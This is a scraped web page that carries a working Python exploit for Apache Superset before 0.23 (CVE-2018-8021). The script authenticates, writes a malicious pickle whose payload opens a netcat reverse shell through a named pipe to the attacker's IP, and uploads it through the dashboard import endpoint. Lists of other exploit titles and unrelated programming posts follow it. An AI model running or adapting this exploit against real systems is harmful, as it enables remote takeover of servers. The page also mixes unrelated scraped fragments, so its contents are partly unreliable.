# Exploit Title: Apache Superset < 0.23 - Remote Code Execution

# Date: 2018-05-17

# Exploit Author: David May (david.may@semanticbits.com)

# Vendor Homepage: https://superset.apache.org/

# Software Link: https://github.com/apache/incubator-superset

# Version: Any before 0.23

# Tested on: Ubuntu 18.04

# CVE-ID: CVE-2018-8021

# I originally disclosed this to the Apache Superset team back in May, and the fix had already been

# in place, but not backported. As far as I know, this is the first weaponized exploit for this CVE.

#!/usr/bin/env python

import sys

import os

from lxml import html

import requests

# Change these values to your TCP listener

myIP = '192.168.137.129'

myPort = ''

# Credentials must belong to user with 'can Import Dashboards on Superset' privilege

username = 'test'

password = 'test'

# Logic in case script arguments are not given

if len(sys.argv) < 3:

    print('Verify you have started a TCP listener on the specified IP and Port to receive the reverse shell...')

    print('Script Usage:')

    print('./supersetrce.py <superset server ip> <superset port>')

    sys.exit()

else:

    # Script arguments

    supersetIP = sys.argv[1]

    supersetPort = sys.argv[2]

    # Verify these URLs match your environment

    login_URL = 'http://' + supersetIP + ':' + supersetPort + '/login/'

    upload_URL = 'http://' + supersetIP + ':' + supersetPort + '/superset/import_dashboards'

    # Checks to see if file that we are going to write already exists in case this is run more than once

    if os.path.isfile('evil.pickle'):

        os.remove('evil.pickle')

    # Headers that we append to our POST requests

    headers_dict = {

        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0',

        'DNT': '',

        'Connection': 'close',

        'Upgrade-Insecure-Requests': '',

    }

    # Creates evil pickle file and writes the reverse shell to it

    evilPickle = open('evil.pickle','w+')

    evilPickle.write('cos\nsystem\n(S\'rm /tmp/backpipe;mknod /tmp/backpipe p;/bin/sh 0</tmp/backpipe | nc ' + myIP + ' ' + myPort + ' 1>/tmp/backpipe\'\ntR.')

    evilPickle.close()

    # Start a session so we have persistent cookies

    session = requests.session()    

    # Grabs the Login page to parse it for its CSRF token

    login_page = session.get(login_URL)

    if login_page.status_code != 200:

        print('Login page not reached, verify URLs in script')

    login_tree = html.fromstring(login_page.content)

    csrf_token = login_tree.xpath('//input[@id="csrf_token"]/@value')

    # Form data that is sent in the POST request to Login page

    login_data = {

        'csrf_token' : csrf_token,

        'username' : username,

        'password' : password,

    }

    # Adds the Referer header for the login page

    headers_dict['Referer'] = login_URL

    # Logon action

    login = session.post(login_URL, headers=headers_dict, data=login_data)    

    # Grabs the Upload page to parse it for its CSRF token

    upload_page = session.get(upload_URL)

    if upload_page.status_code != 200:

        print('Upload page not reached, verify credentials and URLs in script')

    upload_tree = html.fromstring(upload_page.content)

    csrf_token = upload_tree.xpath('//input[@id="csrf_token"]/@value')

    # Adds the Referer header for the Upload page

    headers_dict['Referer'] = upload_URL

    # Upload action

    upload = session.post(upload_URL, headers=headers_dict, data={'csrf_token':csrf_token}, files={'file':('evil.pickle',open('evil.pickle','rb'),'application/octet-stream')})

    # Closes the session

    session.close()

    sys.exit()

[EXP]Apache Superset < 0.23 - Remote Code Execution的更多相关文章

  1. Apache / PHP 5.x Remote Code Execution Exploit

    测试方法: 本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! /* Apache Magica by Kingcope */ /* gcc apache-magika.c -o ...

  2. [EXP]phpBB 3.2.3 - Remote Code Execution

    // All greets goes to RIPS Tech // Run this JS on Attachment Settings ACP page var plupload_salt = ' ...

  3. [EXP]ThinkPHP 5.0.23/5.1.31 - Remote Code Execution

    # Exploit Title: ThinkPHP .x < v5.0.23,v5.1.31 Remote Code Execution # Date: -- # Exploit Author: ...

  4. [我的CVE][CVE-2017-15708]Apache Synapse Remote Code Execution Vulnerability

    漏洞编号:CNVD-2017-36700 漏洞编号:CVE-2017-15708 漏洞分析:https://www.javasec.cn/index.php/archives/117/ [Apache ...

  5. [EXP]Microsoft Windows MSHTML Engine - "Edit" Remote Code Execution

    # Exploit Title: Microsoft Windows (CVE-2019-0541) MSHTML Engine "Edit" Remote Code Execut ...

  6. CVE-2014-6321 && MS14-066 Microsoft Schannel Remote Code Execution Vulnerability Analysis

    目录 . 漏洞的起因 . 漏洞原理分析 . 漏洞的影响范围 . 漏洞的利用场景 . 漏洞的POC.测试方法 . 漏洞的修复Patch情况 . 如何避免此类漏洞继续出现 1. 漏洞的起因 这次的CVE和 ...

  7. Tomcat put上传漏洞_CVE2017-12615( JSP Upload Bypass/Remote Code Execution)

    CVE2017-12615漏洞复现( tomcat JSP Upload Bypass /Remote Code Execution) 一.漏洞原理 在windows服务器下,将readonly参数设 ...

  8. MyBB \inc\class_core.php <= 1.8.2 unset_globals() Function Bypass and Remote Code Execution(Reverse Shell Exploit) Vulnerability

    catalogue . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 MyBB's unset_globals() function ca ...

  9. Roundcube 1.2.2 - Remote Code Execution

    本文简要记述一下Roundcube 1.2.2远程代码执行漏洞的复现过程. 漏洞利用条件 Roundcube必须配置成使用PHP的mail()函数(如果没有指定SMTP,则是默认开启) PHP的mai ...

随机推荐

  1. day34 并发编程之生产者消费者模型 队列

    1.守护进程(了解) """ 守护进程 表示 一个进程b 守护另一个进程a 当被守护的进程a结束后 那么b也跟着结束了 就像 皇帝驾崩 妃子殉葬 应用场景 之所以开启子进 ...

  2. spark streaming之三 rdd,job的动态生成以及动态调度

    前面一篇讲到了,DAG静态模板的生成.那么spark streaming会在每一个batch时间一到,就会根据DAG所形成的逻辑以及物理依赖链(dependencies)动态生成RDD以及由这些RDD ...

  3. PHP Laravel定时任务Schedule

    前提:本文方法是利用Linux的crontab定时任务来协助实现Laravel调度(Mac也一样). 一.首先添加Crontab定时任务,这里只做简单介绍. 用命令crontab -e 添加如下内容 ...

  4. protobuf shutdownprotobuflibrary的时候crash,释放的指针出错

    往往是多个子项目中有多次链接使用. 解决方法: 1. 使用静态库. 2. issure中有说2.6.1还未允许多次释放,建议使用3.4.x版本. 参考: https://github.com/prot ...

  5. react官方脚手架搭建项目

    1.全局安装 npm install -g create-react-app 2. app后面还要给项目文件命名 create-react-app //是全局命令来创建react项目 3.然后按照提示 ...

  6. vue入门一

    <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8&quo ...

  7. 最长子序列dp poj2479 题解

    Maximum sum Time Limit: 1000MS   Memory Limit: 65536K Total Submissions: 44476   Accepted: 13796 Des ...

  8. python 常用知识点

    1,字典get用法 如果key没有值,返回一个None >>> dic = {'k1':'v1','k2':'v2','k3':'v3'} >>> dic.get( ...

  9. mui几种页面跳转方式对比

    1.初始化时创建子页面 mui.init({ subpages: [{ url: your - subpage - url, //子页面HTML地址,支持本地地址和网络地址 id: your - su ...

  10. kubernetes中filebeat以sidecar方式和应用一起部署,并且传入环境变量

    本文的环境介绍 [root@m-30-1 ~]# kubectl version Client Version: version.Info{Major:"1", Minor:&qu ...